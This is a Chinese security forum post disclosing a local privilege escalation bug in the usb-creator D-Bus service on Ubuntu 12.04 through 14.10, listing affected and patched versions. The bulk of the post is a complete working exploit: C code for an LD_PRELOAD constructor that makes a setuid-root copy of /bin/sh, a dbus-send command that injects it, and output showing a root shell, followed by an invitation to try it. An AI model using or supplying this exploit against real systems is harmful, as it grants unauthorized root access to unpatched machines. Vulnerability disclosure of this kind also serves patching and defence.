Ubuntu曝本地权限提升漏洞,影响12.04 – 14.10版本(含EXP)

2015-04-24 16:26:53 20 10393
Ubuntu12.04-14.10曝出本地权限提升漏洞,该漏洞由Google的大神Tavis Ormandy发出,包含漏洞利用测试程序。

影响版本:

Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1)
Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1)
Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3)

EXP:
$ cat > test.c

void __attribute__((constructor)) init (void)

{

chown("/tmp/test", 0, 0);

chmod("/tmp/test", 04755);

}

^D

$ gcc -shared -fPIC -o /tmp/test.so test.c

$ cp /bin/sh /tmp/test

$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"

method return sender=:1.4364 -> dest=:1.7427 reply_serial=2

$ ls -l /tmp/test

-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test

$ /tmp/test

# id

euid=0(root) groups=0(root)
大家试试看。
类别 手机无线

关于作者

godblack487篇文章1194篇回复T00ls认证专家。

一个高尚的人,一个纯粹的人,一个有道德的人,一个脱离了低级趣味的人,一个有益于人民的人。

godblack
20

评论20次

要评论?请先  登录  或  注册